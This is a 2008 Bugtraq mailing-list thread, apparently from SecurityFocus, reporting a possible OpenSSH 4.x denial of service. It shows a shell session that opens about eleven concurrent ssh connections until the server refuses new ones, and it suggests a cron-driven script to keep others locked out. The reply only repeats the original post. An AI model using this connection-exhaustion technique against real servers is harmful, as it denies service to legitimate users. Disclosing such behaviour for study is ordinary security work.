Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Vuln Dev
Back to list
|
Post reply
OpenSSH 4.X DoS (maybe...)
Feb 26 2008 10:13PM
sipherr gmail com
(1 replies)
OpenSSH 4.X deny remote connections.
The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.
To reproduce:
telnet 3.1.33.7 22
Trying 3.1.33.7...
Connected to 3.1.33.7.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7p1 Debian-2
Protocol mismatch.
Connection closed by foreign host.
darkstar# ssh 3.1.33.7
The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.
RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.
root (at) 3.1.33 (dot) 7 [email concealed]'s password:
darkstar# ssh 3.1.33.7
darkstar# ssh 3.1.33.7 &
[1] 12945
darkstar# ssh 3.1.33.7 &
[2] 12946
darkstar# ssh 3.1.33.7 &
[3] 12947
darkstar# ssh 3.1.33.7 &
[4] 12948
darkstar# ssh 3.1.33.7 &
[5] 12949
darkstar# ssh 3.1.33.7 &
[6] 12950
darkstar# ssh 3.1.33.7 &
[7] 12951
darkstar# ssh 3.1.33.7 &
[8] 12952
darkstar# ssh 3.1.33.7 &
[9] 12953
darkstar# ssh 3.1.33.7 &
[10] 12954
darkstar# ssh 3.1.33.7 &
[11] 12955
darkstar#
ssh_exchange_identification: Connection closed by remote host
An attacker could cronjob a script to force this condition to remain true.
This will deny anyone else from connecting to the service. Normal behaviour?
Shouts: burnout,spithash princess^pookie, #codemasters
[ reply ]
Re: OpenSSH 4.X DoS (maybe...)
Feb 29 2008 05:01PM
Eygene Ryabinkin (rea-sec codelabs ru)
Privacy Statement
Copyright 2008, SecurityFocus
The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.
To reproduce:
telnet 3.1.33.7 22
Trying 3.1.33.7...
Connected to 3.1.33.7.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7p1 Debian-2
Protocol mismatch.
Connection closed by foreign host.
darkstar# ssh 3.1.33.7
The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.
RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.
root (at) 3.1.33 (dot) 7 [email concealed]'s password:
darkstar# ssh 3.1.33.7
darkstar# ssh 3.1.33.7 &
[1] 12945
darkstar# ssh 3.1.33.7 &
[2] 12946
darkstar# ssh 3.1.33.7 &
[3] 12947
darkstar# ssh 3.1.33.7 &
[4] 12948
darkstar# ssh 3.1.33.7 &
[5] 12949
darkstar# ssh 3.1.33.7 &
[6] 12950
darkstar# ssh 3.1.33.7 &
[7] 12951
darkstar# ssh 3.1.33.7 &
[8] 12952
darkstar# ssh 3.1.33.7 &
[9] 12953
darkstar# ssh 3.1.33.7 &
[10] 12954
darkstar# ssh 3.1.33.7 &
[11] 12955
darkstar#
ssh_exchange_identification: Connection closed by remote host
An attacker could cronjob a script to force this condition to remain true.
This will deny anyone else from connecting to the service. Normal behaviour?
Shouts: burnout,spithash princess^pookie, #codemasters
[ reply ]